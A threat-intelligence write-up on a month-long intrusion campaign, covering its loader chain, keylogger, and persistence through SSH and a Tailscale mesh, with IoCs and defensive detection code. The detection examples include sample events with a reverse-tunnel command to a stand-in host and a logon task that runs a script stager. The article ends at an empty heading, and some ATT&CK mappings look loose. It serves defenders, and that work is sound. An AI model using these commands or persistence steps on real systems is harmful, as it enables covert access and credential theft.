
Operation Poisson: How a Junior Cybercriminal Built Persistence That Outlived His C2

June 25, 2026
Aaron Beardslee

Overview

Between March 30 and May 1, 2026, Cato CTRL researcher Vitaly Simonovich tracked a French-speaking cybercriminal known by the handle "Poisson" through every command of a 33-day intrusion operation. The result was 339 recorded commands, four compromised victims, and a persistence mechanism that continued functioning for 18 days after the attacker's primary command-and-control (C2) server went offline.

What makes Operation Poisson stand out from the routine credential-theft campaigns that plague small businesses is not the sophistication of the attacker. Poisson is, by all available indicators, a junior operator -- likely a student learning offensive security while running live operations against real targets. What makes it notable is the specific persistence decision he made on Day 8: installing OpenSSH Server and Tailscale VPN on a victim machine to create a resilient access layer entirely independent of his C2 framework.

That single move validated what defenders have theorized for years but rarely had documented proof of: killing a C2 server is not the same as evicting an attacker. If the attacker has already built a parallel access path through a legitimate VPN mesh, the remediation accomplishes nothing.

This article examines the full operation, the attacker's tooling and techniques, the infrastructure he used, and what it means for detection and response teams.


Threat Actor Profile

Poisson is assessed as a junior, independent, financially motivated threat actor operating with a French-language context. He is not attributed to any known APT group or ransomware crew.

Handle: Poisson (French for "fish")
Secondary Handle: Stikou68
Linux Identity: avenger@ubuntu, home directory at /home/avenger/Desktop/
Language: French (installation notes, victim machines, and playbook were all in French)
Skill Level: Low-to-intermediate; failed approximately half of his attempted actions
Motivation: Financial -- targeting banking credentials, email passwords, and government portal access
Infrastructure Tier: Entirely free-tier (DuckDNS, Backblaze B2, budget IONOS VPS)

The "68" in his secondary handle is a significant detail. In France, "68" refers to the département Haut-Rhin in the Alsace region. Victim 1, a French automotive small business, operated in the same region. This detail was not deliberately disclosed by the attacker -- it was extracted from a test keystroke file he inadvertently left inside his own keylogger package, where he had typed "Stikou68!!!" repeatedly while testing the tool.

Operational Schedule: Cato CTRL observed consistent activity after 15:00 CET with a six-hour midday gap and occasional late-night sessions. This pattern is consistent with a school or academic schedule rather than a professional working day.

OPSEC Failures:

  • Leaked his home directory path five times across the campaign
  • Named Backblaze B2 buckets after his own handle (pois43, sentiwaw)
  • Left his complete SSH playbook, victim SSH keys, and French installation notes on a publicly accessible Backblaze B2 storage bucket
  • Left a self-incriminating test keystroke file inside his keylogger package
  • Failed at UAC elevation dozens of times before succeeding
  • Bandwidth caps on his free-tier Backblaze storage blocked his own payload downloads mid-operation for hours

Despite this, he compromised four machines, harvested credentials from real people, and built access that survived his own C2 going dark.


Targets

Poisson focused exclusively on French victims, likely due to language familiarity and geographic proximity. Cato CTRL identified the following victim profile:

  • Victim 1: A French automotive small business (region: Alsace, département 68)
  • Victims 2-4: French individuals, one confirmed in Val-d'Oise (département 95, near Paris)

All targets were running Windows. Victim 3, the primary target of extended operations, was confirmed to be running Windows 11 on physical hardware (ASRock B760M motherboard, Intel 12th-generation CPU) -- not a virtual machine, which is relevant because some of his sandbox evasion logic would have behaved differently in a VM.

The narrow targeting and manual credential-retrieval approach suggest this was not an automated mass campaign. Poisson was operating against a small, known-quantity victim set and retrieving the output by hand through the C2 session.


Infrastructure

Poisson built his infrastructure entirely from free-tier services:

Component -- Detail
C2 Teamserver -- 217[.]154[.]217[.]139 (IONOS SE, Berlin)
C2 Redirector -- 217[.]154[.]162[.]45 (IONOS SE, Berlin)
TLS Certificate CN -- wawsenti[.]duckdns[.]org
Payload Staging Bucket 1 -- pois43[.]s3[.]eu-central-003[.]backblazeb2[.]com
Payload Staging Bucket 2 -- w456w5[.]s3[.]eu-central-003[.]backblazeb2[.]com
Payload Staging Bucket 3 -- sentiwaw[.]s3[.]eu-central-003[.]backblazeb2[.]com
C2 Framework -- Havoc (Demon agent)
DNS -- DuckDNS (free dynamic DNS)

The naming convention across his buckets is consistent with his handles. "Pois" is short for Poisson, "senti" appears to be derived from his malware component senti.dll, and "waw" appears to come from his DuckDNS subdomain wawsenti. The bucket sentiwaw combines both elements and was specifically used to host the SSH packages and his playbook -- the bucket that was publicly readable and exposed his entire operation.


Kill Chain: Stage by Stage

Stage 1 -- VBScript Stager (sys.vbs)

The initial stager was a 1.1 KB VBScript file encrypted with AES. Its first action upon execution was a 120-second sleep -- a simple but effective sandbox evasion technique, as many automated analysis environments time out before the payload executes. After the delay, the script decrypted an embedded PowerShell payload and executed it.

To avoid static detection on the invocation string, the script split the expression across a string concatenation: 'Invoke'+'-Expression'. This is a well-known but still functional obfuscation technique that fools basic signature matching.

SHA256: aa7ea19e34567458b4ee66a7cd274181764984bf32123f756a7fdc64d5857b31
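The concatenation trick above defeats a literal substring match, so a scanner that wants to catch it has to join adjacent string literals before applying its signatures. The following Python is an added example, not code from Cato CTRL or from the campaign: the three sample script snippets are constructed, and the two signatures (Invoke-Expression and its IEX alias) stand in for whatever rule set a real scanner carries.

```python
import re

# Constructed samples (not from the campaign): the split-name trick described
# above, a plain invocation, and a benign concatenation that must not alert.
OBFUSCATED_SAMPLE = "$cmd = 'Invoke'+'-Expression'\n& $cmd $decoded\n"
PLAIN_SAMPLE = "Invoke-Expression $decoded\n"
BENIGN_SAMPLE = "Write-Host ('Hello' + ' world')\n"

# A run of two or more quoted literals joined by '+', e.g. 'a'+"b" + 'c'.
_CONCAT = re.compile(r"""(['"])(?:(?!\1).)*\1(?:\s*\+\s*(['"])(?:(?!\2).)*\2)+""")
_LITERAL = re.compile(r"""(['"])((?:(?!\1).)*)\1""")


def normalize_concatenations(script: str) -> str:
    """Collapse each run of concatenated literals into one single-quoted literal.

    This is a pre-processing step for signature matching only; it does not
    evaluate the script or resolve variables.
    """
    def join(match):
        parts = [lit.group(2) for lit in _LITERAL.finditer(match.group(0))]
        return "'" + "".join(parts) + "'"
    return _CONCAT.sub(join, script)


# Signatures a basic scanner would look for in the raw text.
SIGNATURES = {
    "invoke-expression": re.compile(r"invoke-expression", re.IGNORECASE),
    "iex-alias": re.compile(r"\biex\b", re.IGNORECASE),
}


def find_signatures(script: str) -> list:
    """Names of the signatures that match, sorted for stable comparison."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(script))


def scan(script: str) -> dict:
    """Compare what a raw match sees with what a normalised match sees."""
    return {
        "raw_hits": find_signatures(script),
        "normalized_hits": find_signatures(normalize_concatenations(script)),
    }


if __name__ == "__main__":
    for label, sample in [("obfuscated", OBFUSCATED_SAMPLE),
                          ("plain", PLAIN_SAMPLE),
                          ("benign", BENIGN_SAMPLE)]:
        print(label, scan(sample))
```

On the obfuscated sample the raw match returns nothing and the normalised match returns the Invoke-Expression hit; the benign Write-Host line is collapsed to a single literal and still produces no alert. The same normalisation step generalises to any other cmdlet name a script splits across literals.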

Stage 2 -- Fileless Multi-Layer Loader (senti.dll)

The most technically interesting component of the campaign is senti.dll, a 3.1 MB .NET DLL that functions as a five-layer shellcode delivery vehicle with zero files written to disk.

The outer layer encodes shellcode as a sequence of 207,813 English words. Each word maps to a byte value -- for example, "manage" decodes to 0x4D and "therapist" to 0x48. This word-encoding scheme makes the payload look like a large English text corpus at a glance and bypasses tools that scan for shellcode byte patterns.

Inside the word-encoded layer is a Donut-style reflective PE loader using XOR key 0x02, which wraps the actual Havoc Demon agent payload (XOR key 0x01). The Demon agent runs entirely in memory and establishes the C2 connection back to Poisson's IONOS server.

The five-layer structure -- VBScript stager > PowerShell loader > .NET DLL > reflective loader > Demon agent -- means the actual implant never touches disk in any recognizable form.

SHA256: 3b7642b0f84e83a36334c608655c6cb7aae774839a6a3488526b853d89830a60

Stage 3 -- UAC Elevation (Start-Process -Verb RunAs)

Once the Demon agent was running, Poisson attempted to escalate privileges using Start-Process -Verb RunAs. This is not a UAC bypass -- it is the standard Windows privilege elevation dialog. The user sees a consent prompt and must click "Yes." There is no silent exploitation here.

On Victims 1 and 2, someone clicked "Yes" quickly. On Victim 3, it took more than a dozen attempts spread across two days before the user granted consent. This is a meaningful indicator of operational noise: repeated UAC prompts on a machine are a direct detection signal that most endpoint alerting should catch.

Stage 4 -- Persistence Layer

After achieving admin privileges, Poisson deployed three overlapping persistence mechanisms:

  1. Scheduled Task ("TaskAdmin1"): Runs the VBScript stager at every logon with highest privileges. This is the primary re-infection vector on reboot.
  2. Startup Shortcut (sys.lnk): Placed in the user's Startup folder as a secondary persistence mechanism.
  3. Shellcode Injection into Explorer.EXE: The Demon agent shellcode was injected into the explorer.exe process, keeping the implant alive in memory without a standalone malware process visible in the process list.

Stage 5 -- Backup Remote Access (RustDesk)

Poisson deployed a custom-compiled version of RustDesk, a legitimate open-source remote desktop application, with his own relay server configuration baked in. This gave him a graphical remote access channel independent of the Havoc C2 framework.

RustDesk is significant here for two reasons. First, it is a signed, legitimate binary -- most AV and EDR products will not flag it by default. Second, it provides a graphical session in addition to the shell access through Havoc, allowing Poisson to navigate the filesystem visually, take screenshots, and browse through victim files without needing to know specific paths.

SHA256 (RustCustom.zip): c79091ceae7cd592fc08e4854cda7c1182af762b6b126371cc604debdc995fc7

Stage 6 -- Keylogger Deployment (KeyL.zip)

The credential collection mechanism was a 70-line Python script using the pynput library. It logged every keystroke to a local plaintext file on the victim machine. There was no automatic exfiltration -- no beacon, no upload server. Poisson manually retrieved the log file through his Havoc session.

He checked the keylogger output four times on a single day (April 2), confirming approximately 3,000 characters of captured keystrokes in a single active session on Victim 3. The targets were banking credentials, email passwords, and government portal logins -- the kind of credentials that give direct financial access to a small business owner.

To ensure continuous harvesting, Poisson ran powercfg /change standby-timeout-ac 300, setting the machine's sleep timeout to 300 minutes. The machine would stay awake and continue logging keystrokes around the clock.

SHA256 (KeyL.zip): 1f00fd604bb18bbe3081f9ce8d741c4029d2a2125eb8888ac4e0d955938059d6

Stage 7 -- VPN Mesh Persistence (The Critical Move)

On the night of April 7, during a five-hour session, Poisson executed the most consequential action of the entire campaign.

From his sentiwaw Backblaze bucket -- the one that also contained his readable playbook -- he downloaded an SSH package. He then:

  1. Installed OpenSSH Server on Victim 3's machine
  2. Configured key-based SSH authentication using his avenger@ubuntu SSH key pair
  3. Installed Tailscale VPN
  4. Joined Victim 3's machine to his private Tailscale mesh network
  5. Established an SSH reverse tunnel using ssh -R
  6. Tested both access paths

The Tailscale mesh creates an encrypted peer-to-peer network between enrolled nodes. Once a machine is joined to the mesh, it can be reached by other enrolled devices over Tailscale's network regardless of NAT, firewalls, or public IP changes. The SSH server running on Victim 3 was reachable through Tailscale without any exposed public port.

This access path had no dependency on the Havoc C2 server. It required no separate beaconing, no C2 connectivity, and no active session. It simply waited.


Timeline

Date -- Event
March 30 -- Day 1: Victim 1 compromised in 83 minutes. Scheduled task, RustDesk deployed.
March 31 -- Persistence established on Victim 3. First UAC elevation attempts fail.
April 1 -- 51 commands (most active day). UAC eventually succeeds on Victim 3.
April 2 -- Keylogger deployed. Credentials harvested. powercfg keeps machine awake.
April 3-6 -- Maintenance, brief Victim 4 connection (4 minutes, likely testing).
April 7 -- OpenSSH Server + Tailscale installed. VPN mesh persistence established.
April 8 -- Brief morning session, final power settings. C2 goes offline at 20:44 UTC.
April 8-25 -- C2 dark for 18 days. Tailscale and SSH access remain active throughout.
April 26 -- C2 returns online. All victim agents reconnect automatically.
April 26-30 -- 145 more commands. Keylogger harvested four times in 40 minutes on April 30.
April 30 -- certutil -scinfo run 10 times. Thales.zip accessed. Two .NET apps run.
April 30, 18:14 UTC -- Final recorded command. 17 files deleted including Thales artifacts.
May 1 -- C2 goes offline again. Has not returned.

The Open Question: Thales.zip

The unresolved element of this campaign is what happened on April 30 when Poisson transferred a file called Thales.zip from a victim's Downloads folder to Victim 3's machine.

He extracted a .NET application called WinFormsApp1.exe and ran it for 21 unattended minutes. He then ran a second file he had pre-staged in his own Backblaze bucket -- Thal.exe, a 148 MB self-contained executable bundled with the full .NET 8.0 runtime -- for another 11 minutes.

The naming is notable. Thales is a major French defense and technology company. Whether the file was something Poisson obtained, something belonging to a victim, or something else entirely is unknown. After both executions completed, Poisson spent four minutes deleting 17 files including all Thales-related artifacts.

The combination of prior certutil -scinfo smart card enumeration and the execution of an unknown application labeled with a defense contractor name -- followed by careful cleanup -- is the part of this campaign that remains unexplained.

SHA256 (Thal.exe): 0378a5ef51b008aa2d6b76bd44a0bf061339bc3b737a188ec82029444d4d18fe


Attribution and Context

Poisson is not attributed to a known APT group. The free-tier infrastructure, inconsistent operational tempo, high failure rate, and French language indicators all point to an individual operator without organizational backing.

The assessment of "junior" should not, however, be read as "harmless." Poisson succeeded. He compromised real machines, stole credentials from real people at a real business, and his access outlived his C2 being taken down. The lower bar for entry into offensive operations -- driven by openly available frameworks like Havoc, legitimate remote access tools like RustDesk and Tailscale, and free hosting infrastructure -- means that what once required significant technical skill can now be executed, imperfectly but effectively, by someone still learning.


Relevant History: Tailscale, RustDesk, and Legitimate Tool Abuse

Operation Poisson is not the first campaign to weaponize Tailscale. The technique of using legitimate VPN mesh software as a persistence and access layer has precedent at the highest levels of the threat landscape.

APT31 (China-nexus) used Tailscale to tunnel network traffic out of compromised Russian IT firms throughout 2024 and into 2025. In those operations, Tailscale served as an encrypted egress channel that blended with legitimate corporate VPN traffic.

Scattered Spider, the social engineering-focused group responsible for high-profile breaches including MGM Resorts and Caesars Entertainment, has used legitimate remote access tools including Ngrok and Fleetdeck as persistence mechanisms and access channels. The pattern of using signed, commercially available software to maintain access is consistent with Poisson's approach.

Akira Ransomware operators have been observed deploying RustDesk as a backup remote access channel in recent intrusion campaigns, mirroring Poisson's use of a custom-compiled RustDesk as a secondary C2 path.

The thread connecting these examples is the same principle Poisson applied: signed, legitimate binaries do not trip file-based detection. Detection that focuses on file reputation and hash matching fails to catch these tools because the tools themselves are not malicious -- only their deployment context is. Behavioral detection, not file scanning, is the required response.

This is also not the first time Havoc has been used as a C2 framework in targeted intrusions. Since its public release, Havoc has appeared in campaigns attributed to multiple threat actors across different geographies and motivations, largely because it is capable, open-source, and generates C2 traffic that can be configured to blend with legitimate HTTPS.


Detection Guidance

Process-Level Detections (Windows EDR)

OpenSSH Server Installation on Workstations
OpenSSH Server installation on a Windows workstation is rarely legitimate. The Windows capability OpenSSH.Server~~~~0.0.1.0 (installed with Add-WindowsCapability) has a clear install event that should generate an alert on any non-server machine.

Relevant process indicators:

  • Add-WindowsCapability with parameter OpenSSH.Server
  • sc.exe creating or starting service sshd
  • sshd.exe running on a workstation-class host

Tailscale Installation
tailscale.exe or tailscaled.exe appearing on machines that do not have an approved VPN inventory entry should generate an immediate alert. Watch for:

  • Tailscale installer execution
  • Service creation for Tailscale
  • Network connections from tailscaled.exe to Tailscale's coordination and relay infrastructure (controlplane.tailscale.com, *.tailscale.io)
  • DNS queries to Tailscale coordination infrastructure from non-approved hosts

SSH Reverse Tunnel Establishment
The command ssh -R (remote port forwarding) from an endpoint to an external host is anomalous in virtually any enterprise environment. Process creation events showing ssh.exe with -R arguments should alert immediately.

Scheduled Task with Highest Privileges Running Script Interpreters
The scheduled task TaskAdmin1 is campaign-specific, but the behavioral pattern is generic: a scheduled task configured with -RunLevel Highest (or the equivalent XML <RunLevel>HighestAvailable</RunLevel>) that executes wscript.exe, powershell.exe, cmd.exe, or similar interpreters should be flagged on any workstation.

powercfg Standby Timeout Modification
powercfg /change standby-timeout-ac is not a malicious command on its own, but it is a known component of attacker persistence workflows where the attacker needs a machine to remain awake for ongoing credential harvesting or C2 beaconing. Alert on this command being run from unusual parent processes or in conjunction with other suspicious activity.

wscript.exe Executing .vbs from User-Writable Directories
Poisson staged his VBScript stager in user-accessible paths. wscript.exe executing .vbs files from %APPDATA%, %TEMP%, %USERPROFILE%, or \Downloads\ should generate an alert.

Shellcode Injection into Explorer.exe
Process injection into explorer.exe from an unexpected parent process is a high-fidelity detection signal. Sysmon Event ID 8 (CreateRemoteThread) targeting explorer.exe from a non-system process is worth alerting on.
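To show how the process-level indicators above stack up on a single host, here is an added Python example (not tooling from Cato CTRL or from the campaign) that evaluates constructed Sysmon-style process-creation records against rules built from this section and escalates any host that trips several of them. Host names, file paths, parent processes and command lines are constructed; the only campaign-specific strings are the task name TaskAdmin1 and the sys.vbs file name already given above. The rules match on the image path plus command line, and the OpenSSH rules are scoped to workstation-class hosts so a legitimate sshd on a server does not fire.

```python
import re
from dataclasses import dataclass


def ev(host, role, image, parent, cmdline):
    """Minimal Sysmon-like process-creation record (constructed shape)."""
    return {"host": host, "role": role, "image": image, "parent": parent, "cmdline": cmdline}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed telemetry: one workstation showing the persistence stack described
# in this article, one server running sshd legitimately, one quiet workstation.
EVENTS = [
    ev("WS-ACCT-04", "workstation", PS, r"C:\Windows\explorer.exe",
       "powershell.exe Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0"),
    ev("WS-ACCT-04", "workstation", r"C:\Windows\System32\OpenSSH\ssh.exe", r"C:\Windows\System32\cmd.exe",
       "ssh.exe -N -R 2222:127.0.0.1:22 user@operator-host.example"),
    ev("WS-ACCT-04", "workstation", r"C:\Windows\System32\schtasks.exe", PS,
       r'schtasks.exe /Create /TN TaskAdmin1 /SC ONLOGON /RL HIGHEST /TR "wscript.exe C:\Users\u\AppData\Roaming\sys.vbs"'),
    ev("WS-ACCT-04", "workstation", r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\svchost.exe",
       r"wscript.exe C:\Users\u\AppData\Roaming\sys.vbs"),
    ev("WS-ACCT-04", "workstation", r"C:\Windows\System32\powercfg.exe", PS,
       "powercfg.exe /change standby-timeout-ac 300"),
    ev("WS-ACCT-04", "workstation", r"C:\Program Files\Tailscale\tailscaled.exe", r"C:\Windows\System32\services.exe",
       "tailscaled.exe"),
    ev("SRV-JUMP-01", "server", r"C:\Windows\System32\OpenSSH\sshd.exe", r"C:\Windows\System32\services.exe",
       "sshd.exe"),
    ev("WS-DEV-02", "workstation", r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe",
       r"notepad.exe C:\Users\dev\Documents\notes.txt"),
]


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern          # applied to "<image> <cmdline>"
    workstation_only: bool = False


# Directories a standard user can write to (the paths named in this section).
USER_WRITABLE = r"(?:\\AppData\\|\\Temp\\|\\Users\\[^\\\s]+\\(?:Downloads|Desktop)\\)"

RULES = [
    Rule("openssh-server-install",
         re.compile(r"Add-WindowsCapability.*OpenSSH\.Server|\bsc(?:\.exe)?\s+(?:create|start)\s+sshd\b", re.I),
         workstation_only=True),
    Rule("sshd-on-workstation", re.compile(r"\\sshd\.exe\b", re.I), workstation_only=True),
    Rule("ssh-reverse-tunnel", re.compile(r"\\ssh\.exe\b.*\s-R\s", re.I)),
    Rule("tailscale-present", re.compile(r"\\tailscaled?\.exe\b", re.I)),
    Rule("highest-privilege-task-runs-interpreter",
         re.compile(r"(?:/RL\s+HIGHEST|-RunLevel\s+Highest|<RunLevel>HighestAvailable)"
                    r".*(?:wscript|cscript|powershell|cmd)\.exe", re.I | re.S)),
    Rule("powercfg-standby-timeout", re.compile(r"powercfg(?:\.exe)?\s+/change\s+standby-timeout", re.I)),
    Rule("wscript-vbs-user-writable", re.compile(r"\\wscript\.exe\b.*" + USER_WRITABLE + r".*\.vbs\b", re.I)),
]


def evaluate(event: dict) -> list:
    """Names of the rules that fire for one event, in rule order."""
    text = f"{event['image']} {event['cmdline']}"
    hits = []
    for rule in RULES:
        if rule.workstation_only and event.get("role") != "workstation":
            continue
        if rule.pattern.search(text):
            hits.append(rule.name)
    return hits


def triage(events) -> dict:
    """Distinct rule names fired per host, preserving first-seen order."""
    by_host = {}
    for event in events:
        for name in evaluate(event):
            names = by_host.setdefault(event["host"], [])
            if name not in names:
                names.append(name)
    return by_host


def hosts_to_escalate(events, threshold: int = 3) -> list:
    """Hosts where several independent indicators coincide: the persistence stack, not a one-off."""
    return sorted(host for host, names in triage(events).items() if len(names) >= threshold)


if __name__ == "__main__":
    for host, names in triage(EVENTS).items():
        print(host, names)
    print("escalate:", hosts_to_escalate(EVENTS))
```

Each indicator on its own is a reasonable alert; the point of the per-host aggregation is that a workstation showing an OpenSSH install, a reverse tunnel, a highest-privilege task launching a script interpreter, a powercfg change and a Tailscale daemon in one window is the layered persistence this article describes, and should be handled as one incident rather than six tickets.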

Network-Level Detections

DuckDNS Subdomains
Block or alert on DNS resolution of *.duckdns.org at the corporate DNS resolver or proxy layer. While DuckDNS is a legitimate service, it appears consistently in threat actor infrastructure because of its free and anonymous registration model. Most enterprises have no legitimate business reason to resolve DuckDNS subdomains.

Tailscale Coordination Traffic from Unauthorized Hosts
If Tailscale is not an approved enterprise tool, DNS queries to controlplane.tailscale.com or HTTPS connections to *.tailscale.io from endpoint IPs should alert.

Backblaze B2 Object Storage Traffic
Connections to *.backblazeb2.com from endpoints outside of the approved application inventory should be reviewed. Backblaze B2 was used by Poisson for all payload staging and is an increasingly common choice for threat actors due to low cost and CDN-grade delivery.

Havoc C2 Beacon Patterns
Havoc Demon agent traffic uses configurable HTTP/HTTPS profiles but has known default patterns. Network detection signatures for Havoc C2 traffic are available in public threat intelligence feeds.
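The DNS-level indicators above all take the form "this name, or anything under it, from a host with no approved use". The following Python is an added example, not tooling from Cato CTRL or from the campaign, that applies that logic to constructed resolver log lines. It handles the two cases a naive substring check gets wrong: a look-alike such as controlplane.tailscale.com.evil.example must not count as the Tailscale coordination host, and notduckdns.org must not count as a DuckDNS subdomain. The approved-host inventory and every log line are constructed; the watch-list names are the ones given in this section.

```python
# Watch-list from the guidance above. A leading dot means "the domain and any
# label under it"; no leading dot means an exact hostname.
WATCHLIST = {
    ".duckdns.org": "duckdns-dynamic-dns",
    "controlplane.tailscale.com": "tailscale-coordination",
    ".tailscale.io": "tailscale-relay",
    ".backblazeb2.com": "backblaze-b2-object-storage",
}

# (host, label) pairs with a documented business use. Constructed inventory;
# in practice this comes from the approved-application register.
APPROVED = {("BKP-SRV-01", "backblaze-b2-object-storage")}

# Constructed resolver log: "<timestamp> <client host> <queried name>".
SAMPLE_LOG = """\
2026-04-07T19:02:11Z WS-ACCT-04 wawsenti.duckdns.org
2026-04-07T19:05:40Z WS-ACCT-04 controlplane.tailscale.com
2026-04-07T19:05:41Z WS-ACCT-04 relay-example.tailscale.io
2026-04-07T19:20:03Z WS-ACCT-04 sentiwaw.s3.eu-central-003.backblazeb2.com
2026-04-07T19:21:00Z BKP-SRV-01 backup-example.s3.eu-central-003.backblazeb2.com
2026-04-07T19:22:15Z WS-DEV-02 www.example.com
2026-04-07T19:23:00Z WS-DEV-02 controlplane.tailscale.com.evil.example
2026-04-07T19:24:09Z WS-DEV-02 notduckdns.org
"""


def classify(qname: str):
    """Return the watch-list label for a queried name, or None if it is not listed."""
    name = qname.rstrip(".").lower()          # drop the trailing dot, normalise case
    for suffix, label in WATCHLIST.items():
        if suffix.startswith("."):
            # The apex itself or any label under it; the leading dot stops
            # substring look-alikes such as notduckdns.org from matching.
            if name == suffix[1:] or name.endswith(suffix):
                return label
        elif name == suffix:
            return label
    return None


def parse_log(text: str):
    """Yield (timestamp, host, qname) tuples from the constructed log format."""
    for line in text.splitlines():
        if line.strip():
            ts, host, qname = line.split()
            yield ts, host, qname


def alerts(text: str) -> list:
    """Every watch-listed query from a host without an approved use for that service."""
    out = []
    for ts, host, qname in parse_log(text):
        label = classify(qname)
        if label and (host, label) not in APPROVED:
            out.append((ts, host, qname, label))
    return out


if __name__ == "__main__":
    for record in alerts(SAMPLE_LOG):
        print(*record)
```

On the sample log the four WS-ACCT-04 queries alert, the backup server's Backblaze traffic is suppressed by the inventory entry, and neither WS-DEV-02 look-alike produces a hit.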


Indicators of Compromise

Network

Type -- Indicator
C2 Teamserver -- 217[.]154[.]217[.]139
C2 Redirector -- 217[.]154[.]162[.]45
DuckDNS Domain -- wawsenti[.]duckdns[.]org
Payload Staging -- pois43[.]s3[.]eu-central-003[.]backblazeb2[.]com
Payload Staging -- w456w5[.]s3[.]eu-central-003[.]backblazeb2[.]com
Payload Staging -- sentiwaw[.]s3[.]eu-central-003[.]backblazeb2[.]com

File Hashes (SHA256)

File -- SHA256
sys.vbs -- aa7ea19e34567458b4ee66a7cd274181764984bf32123f756a7fdc64d5857b31
senti.dll -- 3b7642b0f84e83a36334c608655c6cb7aae774839a6a3488526b853d89830a60
RustCustom.zip -- c79091ceae7cd592fc08e4854cda7c1182af762b6b126371cc604debdc995fc7
SSH.zip -- f06e7e1a4363a01ba2a4fee2e28abdd623abf4194bda373f23ff0e151b5c2b45
KeyL.zip -- 1f00fd604bb18bbe3081f9ce8d741c4029d2a2125eb8888ac4e0d955938059d6
RevS.ps1 -- 291cb1fd0f2709b4457447cbb87adacf5c36c1bcb0f8754524024d44174bb195
Thal.exe -- 0378a5ef51b008aa2d6b76bd44a0bf061339bc3b737a188ec82029444d4d18fe

Host

Type -- Value
Scheduled Task -- TaskAdmin1 (highest privileges, runs at logon)
Service -- sshd (configured auto-start)
Service -- Tailscale
Firewall Rules -- RustDesk Full Access, RustDesk Full Access OUT, SSH
Operator SSH Key -- ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIUZH+MrtQKX4Cy68ldwV+1KKpOKU/xrdnucyG5eKZAR avenger@ubuntu
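The operator key above is the single most useful host indicator for the Stage 7 persistence, because it survives a C2 takedown in a file the C2 never touched. The following Python is an added example, not tooling from Cato CTRL or from the campaign, that parses an authorized_keys file (on Windows, administrative accounts use %ProgramData%\ssh\administrators_authorized_keys), computes the OpenSSH-style SHA256 fingerprint of each key and classifies it as approved, known-operator or unknown. The approved key and the unknown key are constructed placeholders generated in the code; the only real key material is the operator key copied from the IoC table.

```python
import base64
import hashlib


def _fake_ed25519_line(seed: int, comment: str) -> str:
    """Build a syntactically valid ed25519 public-key line from a constructed
    32-byte value. For the example only; this is not a usable key."""
    blob = (b"\x00\x00\x00\x0bssh-ed25519" + b"\x00\x00\x00\x20"
            + bytes((seed + i) % 256 for i in range(32)))
    return f"ssh-ed25519 {base64.b64encode(blob).decode()} {comment}"


# The operator key published in the IoC table above.
OPERATOR_KEY_IOC = ("ssh-ed25519 "
                    "AAAAC3NzaC1lZDI1NTE5AAAAIIUZH+MrtQKX4Cy68ldwV+1KKpOKU/xrdnucyG5eKZAR "
                    "avenger@ubuntu")

APPROVED_LINE = _fake_ed25519_line(0, "it-jumphost (constructed)")

# Constructed contents of administrators_authorized_keys on a workstation.
SAMPLE_FILE = "\n".join([
    "# managed by IT",
    APPROVED_LINE,
    OPERATOR_KEY_IOC,
    _fake_ed25519_line(100, "unknown@laptop (constructed)"),
    "",
])


def parse_key_line(line: str):
    """Parse one authorized_keys line: None for blanks and comments, ValueError if malformed."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split()
    # The key type may be preceded by an options field (from=, command=, ...).
    # Options that contain quoted whitespace are not handled by this simple split.
    idx = next((i for i, f in enumerate(fields) if f.startswith(("ssh-", "ecdsa-", "sk-"))), None)
    if idx is None or idx + 1 >= len(fields):
        raise ValueError(f"no key type/blob in line: {line!r}")
    ktype, b64 = fields[idx], fields[idx + 1]
    blob = base64.b64decode(b64, validate=True)
    # The blob opens with a length-prefixed copy of the key type; a mismatch means a mangled line.
    n = int.from_bytes(blob[:4], "big")
    if blob[4:4 + n].decode("ascii", "replace") != ktype:
        raise ValueError(f"key type mismatch in line: {line!r}")
    digest = hashlib.sha256(blob).digest()
    return {
        "type": ktype,
        # Same format ssh-keygen -lf prints: base64 of the SHA256 digest, padding stripped.
        "fingerprint": "SHA256:" + base64.b64encode(digest).decode().rstrip("="),
        "comment": " ".join(fields[idx + 2:]),
        "options": " ".join(fields[:idx]),
    }


def fingerprint(line: str) -> str:
    return parse_key_line(line)["fingerprint"]


# Inventory of sanctioned keys and of published operator keys, held as fingerprints
# so that comment fields (which anyone can edit) play no part in the decision.
APPROVED_FINGERPRINTS = {fingerprint(APPROVED_LINE)}
KNOWN_OPERATOR_FINGERPRINTS = {fingerprint(OPERATOR_KEY_IOC)}


def audit(text: str) -> list:
    """Classify every key in an authorized_keys file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        key = parse_key_line(line)
        if key is None:
            continue
        if key["fingerprint"] in KNOWN_OPERATOR_FINGERPRINTS:
            verdict = "known-operator-key"
        elif key["fingerprint"] in APPROVED_FINGERPRINTS:
            verdict = "approved"
        else:
            verdict = "unknown"
        findings.append({"line": lineno, "verdict": verdict, **key})
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_FILE):
        print(finding["line"], finding["verdict"], finding["fingerprint"], finding["comment"])
```

Matching on the fingerprint rather than the comment matters: the avenger@ubuntu comment is trivially changed, while the key blob is what sshd actually authenticates against. Any "unknown" verdict on a workstation that should not be running sshd at all is worth the same response as the known operator key.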

MITRE ATT&CK Mapping

Technique ID -- Technique Name -- Usage
T1059.001 -- Command and Scripting Interpreter: PowerShell -- PowerShell loader chain
T1059.005 -- Command and Scripting Interpreter: VBScript -- sys.vbs initial stager
T1027 -- Obfuscated Files or Information -- Word-encoding, XOR layers, AES encryption in stager
T1055.001 -- Process Injection: Dynamic-link Library Injection -- Shellcode injection into explorer.exe
T1053.005 -- Scheduled Task/Job: Scheduled Task -- TaskAdmin1 persistence
T1547.001 -- Boot or Logon Autostart Execution: Startup Folder -- sys.lnk in Startup folder
T1219 -- Remote Access Software -- RustDesk custom build, OpenSSH Server
T1572 -- Protocol Tunneling -- SSH reverse tunnel via Tailscale mesh
T1021.004 -- Remote Services: SSH -- OpenSSH access through Tailscale
T1056.001 -- Input Capture: Keylogging -- 70-line Python keylogger via pynput
T1529 -- System Shutdown/Reboot (anti-remediation via persistence) -- Scheduled tasks, SSH survive reboot
T1562.001 -- Impair Defenses: Disable or Modify Tools -- powercfg standby modification

Key Takeaways

